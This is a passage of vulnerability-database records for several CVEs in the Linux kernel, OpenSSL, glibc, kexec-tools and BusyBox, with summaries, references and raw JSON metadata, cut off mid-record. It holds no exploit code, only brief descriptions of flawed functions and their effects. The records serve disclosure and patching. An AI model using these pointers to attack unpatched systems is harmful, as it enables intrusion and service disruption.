EPSS score ?
Summary
A vulnerability was found in the Linux kernel's nft_set_desc_concat_parse() function .This flaw allows an attacker to trigger a buffer overflow via nft_set_desc_concat_parse() , causing a denial of service and possibly to run code.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:24:44.192Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "name": "DSA-5161", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.debian.org/security/2022/dsa-5161" }, { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/nf_tables_api.c?id=fecf31ee395b0295f2d7260aa29946b7605f7c85" }, { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096178" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "kernel 5.19 rc1" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability was found in the Linux kernel\u0027s nft_set_desc_concat_parse() function .This flaw allows an attacker to trigger a buffer overflow via nft_set_desc_concat_parse() , causing a denial of service and possibly to run code." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-121", "description": "CWE-121", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-17T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "name": "DSA-5161", "tags": [ "vendor-advisory" ], "url": "https://www.debian.org/security/2022/dsa-5161" }, { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/net/netfilter/nf_tables_api.c?id=fecf31ee395b0295f2d7260aa29946b7605f7c85" }, { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2096178" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-2078", "datePublished": "2022-06-30T00:00:00", "dateReserved": "2022-06-14T00:00:00", "dateUpdated": "2024-08-03T00:24:44.192Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-2959
Vulnerability from cvelistv5
Published
2022-08-25 00:00
Modified
2024-08-03 00:53
Severity ?
EPSS score ?
Summary
A race condition was found in the Linux kernel's watch queue due to a missing lock in pipe_resize_ring(). The specific flaw exists within the handling of pipe buffers. The issue results from the lack of proper locking when performing operations on an object. This flaw allows a local user to crash the system or escalate their privileges on the system.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:53:00.487Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.zerodayinitiative.com/advisories/ZDI-22-1165/" }, { "tags": [ "x_transferred" ], "url": "https://github.com/torvalds/linux/commit/189b0ddc245139af81198d1a3637cac74f96e13a" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230214-0005/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Fixed in kernel 5.19" } ] } ], "descriptions": [ { "lang": "en", "value": "A race condition was found in the Linux kernel\u0027s watch queue due to a missing lock in pipe_resize_ring(). The specific flaw exists within the handling of pipe buffers. The issue results from the lack of proper locking when performing operations on an object. This flaw allows a local user to crash the system or escalate their privileges on the system." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-667", "description": "CWE-667", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-02-14T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://www.zerodayinitiative.com/advisories/ZDI-22-1165/" }, { "url": "https://github.com/torvalds/linux/commit/189b0ddc245139af81198d1a3637cac74f96e13a" }, { "url": "https://security.netapp.com/advisory/ntap-20230214-0005/" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-2959", "datePublished": "2022-08-25T00:00:00", "dateReserved": "2022-08-23T00:00:00", "dateUpdated": "2024-08-03T00:53:00.487Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-1343
Vulnerability from cvelistv5
Published
2022-05-03 15:15
Modified
2024-09-17 03:29
Severity ?
EPSS score ?
Summary
The function `OCSP_basic_verify` verifies the signer certificate on an OCSP response. In the case where the (non-default) flag OCSP_NOCHECKS is used then the response will be positive (meaning a successful verification) even in the case where the response signing certificate fails to verify. It is anticipated that most users of `OCSP_basic_verify` will not use the OCSP_NOCHECKS flag. In this case the `OCSP_basic_verify` function will return a negative value (indicating a fatal error) in the case of a certificate verification failure. The normal expected return value in this case would be 0. This issue also impacts the command line OpenSSL "ocsp" application. When verifying an ocsp response with the "-no_cert_checks" option the command line application will report that the verification is successful even though it has in fact failed. In this case the incorrect successful response will also be accompanied by error messages showing the failure and contradicting the apparently successful result. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2).
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:03:05.875Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://www.openssl.org/news/secadv/20220503.txt" }, { "tags": [ "x_transferred" ], "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=2eda98790c5c2741d76d23cc1e74b0dc4f4b391a" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20220602-0009/" }, { "tags": [ "x_transferred" ], "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "OpenSSL", "vendor": "OpenSSL", "versions": [ { "status": "affected", "version": "Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2)" } ] } ], "credits": [ { "lang": "en", "value": "Raul Metsma" } ], "datePublic": "2022-05-03T00:00:00", "descriptions": [ { "lang": "en", "value": "The function `OCSP_basic_verify` verifies the signer certificate on an OCSP response. In the case where the (non-default) flag OCSP_NOCHECKS is used then the response will be positive (meaning a successful verification) even in the case where the response signing certificate fails to verify. It is anticipated that most users of `OCSP_basic_verify` will not use the OCSP_NOCHECKS flag. In this case the `OCSP_basic_verify` function will return a negative value (indicating a fatal error) in the case of a certificate verification failure. The normal expected return value in this case would be 0. This issue also impacts the command line OpenSSL \"ocsp\" application. When verifying an ocsp response with the \"-no_cert_checks\" option the command line application will report that the verification is successful even though it has in fact failed. In this case the incorrect successful response will also be accompanied by error messages showing the failure and contradicting the apparently successful result. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2)." } ], "metrics": [ { "other": { "content": { "lang": "eng", "url": "https://www.openssl.org/policies/secpolicy.html#Moderate", "value": "Moderate" }, "type": "unknown" } } ], "problemTypes": [ { "descriptions": [ { "description": "Incorrect signature verfication", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2023-02-14T00:00:00", "orgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "shortName": "openssl" }, "references": [ { "url": "https://www.openssl.org/news/secadv/20220503.txt" }, { "url": "https://git.openssl.org/gitweb/?p=openssl.git%3Ba=commitdiff%3Bh=2eda98790c5c2741d76d23cc1e74b0dc4f4b391a" }, { "url": "https://security.netapp.com/advisory/ntap-20220602-0009/" }, { "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-953464.pdf" } ], "title": "OCSP_basic_verify may incorrectly verify the response signing certificate" } }, "cveMetadata": { "assignerOrgId": "3a12439a-ef3a-4c79-92e6-6081a721f1e5", "assignerShortName": "openssl", "cveId": "CVE-2022-1343", "datePublished": "2022-05-03T15:15:21.496146Z", "dateReserved": "2022-04-13T00:00:00", "dateUpdated": "2024-09-17T03:29:05.745Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-27645
Vulnerability from cvelistv5
Published
2021-02-24 00:00
Modified
2024-08-03 21:26
Severity ?
EPSS score ?
Summary
The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T21:26:10.554Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=27462" }, { "name": "FEDORA-2021-6749bfcfd9", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/" }, { "name": "FEDORA-2021-2ba993d6c5", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/" }, { "name": "GLSA-202107-07", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202107-07" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "n/a", "vendor": "n/a", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "The nameserver caching daemon (nscd) in the GNU C Library (aka glibc or libc6) 2.29 through 2.33, when processing a request for netgroup lookup, may crash due to a double-free, potentially resulting in degraded service or Denial of Service on the local system. This is related to netgroupcache.c." } ], "problemTypes": [ { "descriptions": [ { "description": "n/a", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-17T00:00:00", "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "shortName": "mitre" }, "references": [ { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=27462" }, { "name": "FEDORA-2021-6749bfcfd9", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I7TS26LIZSOBLGJEZMJX4PXT5BQDE2WS/" }, { "name": "FEDORA-2021-2ba993d6c5", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/7LZNT6KTMCCWPWXEOGSHD3YLYZKUGMH5/" }, { "name": "GLSA-202107-07", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/202107-07" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ] } }, "cveMetadata": { "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca", "assignerShortName": "mitre", "cveId": "CVE-2021-27645", "datePublished": "2021-02-24T00:00:00", "dateReserved": "2021-02-24T00:00:00", "dateUpdated": "2024-08-03T21:26:10.554Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-20269
Vulnerability from cvelistv5
Published
2022-03-09 16:29
Modified
2024-08-03 17:37
Severity ?
EPSS score ?
Summary
A flaw was found in the permissions of a log file created by kexec-tools. This flaw allows a local unprivileged user to read this file and leak kernel internal information from a previous panic. The highest threat from this vulnerability is to confidentiality. This flaw affects kexec-tools shipped by Fedora versions prior to 2.0.21-8 and RHEL versions prior to 2.0.20-47.
References
▼ | URL | Tags |
---|---|---|
https://bugzilla.redhat.com/show_bug.cgi?id=1934261 | x_refsource_MISC |
Impacted products
Vendor | Product | Version | |
---|---|---|---|
▼ | n/a | kexec-tools |
Version: Fedora kexec-tools versions prior to 2.0.21-8 and RHEL kexec-tools versions prior to 2.0.20-47 |
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T17:37:23.203Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1934261" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "kexec-tools", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Fedora kexec-tools versions prior to 2.0.21-8 and RHEL kexec-tools versions prior to 2.0.20-47" } ] } ], "descriptions": [ { "lang": "en", "value": "A flaw was found in the permissions of a log file created by kexec-tools. This flaw allows a local unprivileged user to read this file and leak kernel internal information from a previous panic. The highest threat from this vulnerability is to confidentiality. This flaw affects kexec-tools shipped by Fedora versions prior to 2.0.21-8 and RHEL versions prior to 2.0.20-47." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-276", "description": "CWE-276", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-03-09T16:29:47", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1934261" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2021-20269", "datePublished": "2022-03-09T16:29:47", "dateReserved": "2020-12-17T00:00:00", "dateUpdated": "2024-08-03T17:37:23.203Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-4095
Vulnerability from cvelistv5
Published
2023-03-22 00:00
Modified
2024-08-03 01:27
Severity ?
EPSS score ?
Summary
A use-after-free flaw was found in Linux kernel before 5.19.2. This issue occurs in cmd_hdl_filter in drivers/staging/rtl8712/rtl8712_cmd.c, allowing an attacker to launch a local denial of service attack and gain escalation of privileges.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:27:54.492Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c53b3dcb9942b8ed7f81ee3921c4085d87070c73" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20230420-0005/" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux Kernel prior to kernel 6.0 rc4" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free flaw was found in Linux kernel before 5.19.2. This issue occurs in cmd_hdl_filter in drivers/staging/rtl8712/rtl8712_cmd.c, allowing an attacker to launch a local denial of service attack and gain escalation of privileges." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-20T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c53b3dcb9942b8ed7f81ee3921c4085d87070c73" }, { "url": "https://security.netapp.com/advisory/ntap-20230420-0005/" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-4095", "datePublished": "2023-03-22T00:00:00", "dateReserved": "2022-11-21T00:00:00", "dateUpdated": "2024-08-03T01:27:54.492Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-42373
Vulnerability from cvelistv5
Published
2021-11-15 00:00
Modified
2024-08-04 03:30
Severity ?
EPSS score ?
Summary
A NULL pointer dereference in Busybox's man applet leads to denial of service when a section name is supplied but no page argument is given
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T03:30:38.267Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "tags": [ "x_transferred" ], "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "busybox", "vendor": "busybox", "versions": [ { "lessThan": "1.34.0", "status": "affected", "version": "unspecified", "versionType": "custom" } ] } ], "descriptions": [ { "lang": "en", "value": "A NULL pointer dereference in Busybox\u0027s man applet leads to denial of service when a section name is supplied but no page argument is given" } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-476", "description": "CWE-476", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-04-25T00:00:00", "orgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "shortName": "JFROG" }, "references": [ { "url": "https://jfrog.com/blog/unboxing-busybox-14-new-vulnerabilities-uncovered-by-claroty-and-jfrog/" }, { "name": "FEDORA-2021-5a95823596", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UQXGOGWBIYWOIVXJVRKHZR34UMEHQBXS/" }, { "name": "FEDORA-2021-c52c0fe490", "tags": [ "vendor-advisory" ], "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/6T2TURBYYJGBMQTTN2DSOAIQGP7WCPGV/" }, { "url": "https://security.netapp.com/advisory/ntap-20211223-0002/" }, { "url": "https://claroty.com/team82/research/unboxing-busybox-14-vulnerabilities-uncovered-by-claroty-jfrog" } ] } }, "cveMetadata": { "assignerOrgId": "48a46f29-ae42-4e1d-90dd-c1676c1e5e6d", "assignerShortName": "JFROG", "cveId": "CVE-2021-42373", "datePublished": "2021-11-15T00:00:00", "dateReserved": "2021-10-14T00:00:00", "dateUpdated": "2024-08-04T03:30:38.267Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-2978
Vulnerability from cvelistv5
Published
2022-08-24 00:00
Modified
2024-08-03 00:53
Severity ?
EPSS score ?
Summary
A flaw use after free in the Linux kernel NILFS file system was found in the way user triggers function security_inode_alloc to fail with following call to function nilfs_mdt_destroy. A local user could use this flaw to crash the system or potentially escalate their privileges on the system.
References
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T00:53:00.619Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://lore.kernel.org/linux-fsdevel/20220816040859.659129-1-dzm91%40hust.edu.cn/T/#u" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "n/a", "versions": [ { "status": "affected", "version": "Linux kernel 6.0-rc3" } ] } ], "descriptions": [ { "lang": "en", "value": "A flaw use after free in the Linux kernel NILFS file system was found in the way user triggers function security_inode_alloc to fail with following call to function nilfs_mdt_destroy. A local user could use this flaw to crash the system or potentially escalate their privileges on the system." } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-12-24T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://lore.kernel.org/linux-fsdevel/20220816040859.659129-1-dzm91%40hust.edu.cn/T/#u" }, { "name": "[debian-lts-announce] 20221223 [SECURITY] [DLA 3245-1] linux security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/12/msg00034.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2022-2978", "datePublished": "2022-08-24T00:00:00", "dateReserved": "2022-08-24T00:00:00", "dateUpdated": "2024-08-03T00:53:00.619Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-1752
Vulnerability from cvelistv5
Published
2020-04-30 00:00
Modified
2024-08-04 06:46
Severity ?
EPSS score ?
Summary
A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32.
References
Impacted products
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T06:46:30.943Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_transferred" ], "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752" }, { "tags": [ "x_transferred" ], "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=25414" }, { "tags": [ "x_transferred" ], "url": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=ddc650e9b3dc916eab417ce9f79e67337b05035c" }, { "tags": [ "x_transferred" ], "url": "https://security.netapp.com/advisory/ntap-20200511-0005/" }, { "name": "USN-4416-1", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://usn.ubuntu.com/4416-1/" }, { "name": "GLSA-202101-20", "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://security.gentoo.org/glsa/202101-20" }, { "name": "[bookkeeper-issues] 20210628 [GitHub] [bookkeeper] padma81 opened a new issue #2746: Security Vulnerabilities in CentOS 7 image, Upgrade image to CentOS 8", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4%40%3Cissues.bookkeeper.apache.org%3E" }, { "name": "[bookkeeper-issues] 20210629 [GitHub] [bookkeeper] padma81 opened a new issue #2746: Security Vulnerabilities in CentOS 7 image, Upgrade image to CentOS 8", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b%40%3Cissues.bookkeeper.apache.org%3E" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list", "x_transferred" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "glibc", "vendor": "GNU Libc", "versions": [ { "status": "affected", "version": "Affected: versions 2.14 and later" }, { "status": "affected", "version": "Fixed: version 2.32" } ] } ], "descriptions": [ { "lang": "en", "value": "A use-after-free vulnerability introduced in glibc upstream version 2.14 was found in the way the tilde expansion was carried out. Directory paths containing an initial tilde followed by a valid username were affected by this issue. A local attacker could exploit this flaw by creating a specially crafted path that, when processed by the glob function, would potentially lead to arbitrary code execution. This was fixed in version 2.32." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "HIGH", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-416", "description": "CWE-416", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2022-10-17T00:00:00", "orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "shortName": "redhat" }, "references": [ { "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-1752" }, { "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=25414" }, { "url": "https://sourceware.org/git/gitweb.cgi?p=glibc.git%3Bh=ddc650e9b3dc916eab417ce9f79e67337b05035c" }, { "url": "https://security.netapp.com/advisory/ntap-20200511-0005/" }, { "name": "USN-4416-1", "tags": [ "vendor-advisory" ], "url": "https://usn.ubuntu.com/4416-1/" }, { "name": "GLSA-202101-20", "tags": [ "vendor-advisory" ], "url": "https://security.gentoo.org/glsa/202101-20" }, { "name": "[bookkeeper-issues] 20210628 [GitHub] [bookkeeper] padma81 opened a new issue #2746: Security Vulnerabilities in CentOS 7 image, Upgrade image to CentOS 8", "tags": [ "mailing-list" ], "url": "https://lists.apache.org/thread.html/rf4c02775860db415b4955778a131c2795223f61cb8c6a450893651e4%40%3Cissues.bookkeeper.apache.org%3E" }, { "name": "[bookkeeper-issues] 20210629 [GitHub] [bookkeeper] padma81 opened a new issue #2746: Security Vulnerabilities in CentOS 7 image, Upgrade image to CentOS 8", "tags": [ "mailing-list" ], "url": "https://lists.apache.org/thread.html/r58af02e294bd07f487e2c64ffc0a29b837db5600e33b6e698b9d696b%40%3Cissues.bookkeeper.apache.org%3E" }, { "name": "[debian-lts-announce] 20221017 [SECURITY] [DLA 3152-1] glibc security update", "tags": [ "mailing-list" ], "url": "https://lists.debian.org/debian-lts-announce/2022/10/msg00021.html" } ] } }, "cveMetadata": { "assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749", "assignerShortName": "redhat", "cveId": "CVE-2020-1752", "datePublished": "2020-04-30T00:00:00", "dateReserved": "2019-11-27T00:00:00", "dateUpdated": "2024-08-04T06:46:30.943Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2022-3629
Vulnerability from cvelistv5
Published
2022-10-21 00:00
Modified
2024-08-03 01:14
Severity ?
2.6 (Low) - CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L
2.6 (Low) - CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L
2.6 (Low) - CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L
EPSS score ?
Summary
A vulnerability was found in Linux Kernel. It has been declared as problematic. This vulnerability affects the function vsock_connect of the file net/vmw_vsock/af_vsock.c. The manipulation leads to memory leak. The complexity of an attack is rather high. The exploitation appears to be difficult. It is recommended to apply a patch to fix this issue. VDB-211930 is the identifier assigned to this vulnerability.
References
▼ | URL | Tags |
---|---|---|
https://vuldb.com/?id.211930 | vdb-entry, technical-description | |
https://vuldb.com/?ctiid.211930 | signature, permissions-required | |
https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=7e97cfed9929eaabc41829c395eb0d1350fccb9d | patch |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T01:14:02.789Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vdb-entry", "technical-description", "x_transferred" ], "url": "https://vuldb.com/?id.211930" }, { "tags": [ "signature", "permissions-required", "x_transferred" ], "url": "https://vuldb.com/?ctiid.211930" }, { "tags": [ "patch", "x_transferred" ], "url": "https://git.kernel.org/pub/scm/linux/kernel/git/klassert/ipsec-next.git/commit/?id=7e97cfed9929eaabc41829c395eb0d1350fccb9d" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Kernel", "vendor": "Linux", "versions": [ { "status": "affected", "version": "n/a" } ] } ], "descriptions": [ { "lang": "en", "value": "A vulnerability was found in Linux Kernel. It has been declared as problematic. This vulnerability affects the function vsock_connect of the file net/vmw_vsock/af_vsock.c. The manipulation leads to memory leak. The complexity of an attack is rather high. The exploitation appears to be difficult. It is recommended to apply a patch to fix this issue. VDB-211930 is the identifier assigned to this vulnerability." }, { "lang": "de", "value": "In Linux Kernel wurde eine Schwachstelle ausgemacht. Sie wurde als problematisch eingestuft. Es geht um die Funktion vsock_connect der Datei net/vmw_vsock/af_vsock.c. Durch Manipulation mit unbekannten Daten kann eine memory leak-Schwachstelle ausgenutzt werden. Die Komplexit\u00e4t eines Angriffs ist eher hoch. Das Ausnutzen gilt als schwierig. Als bestm\u00f6gliche Massnahme wird Patching empfohlen." } ], "metrics": [ { "cvssV3_1": { "baseScore": 2.6, "baseSeverity": "LOW", "vectorString": "CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", "version": "3.1" } }, { "cvssV3_0": { "baseScore": 2.6, "baseSeverity": "LOW", "vectorString": "CVSS:3.0/AV:A/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L", "version": "3.0" } }, { "cvssV2_0": { "baseScore": 1.4, "vectorString": "AV:A/AC:H/Au:S/C:N/I:N/A:P", "version": "2.0" } } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-401", "description": 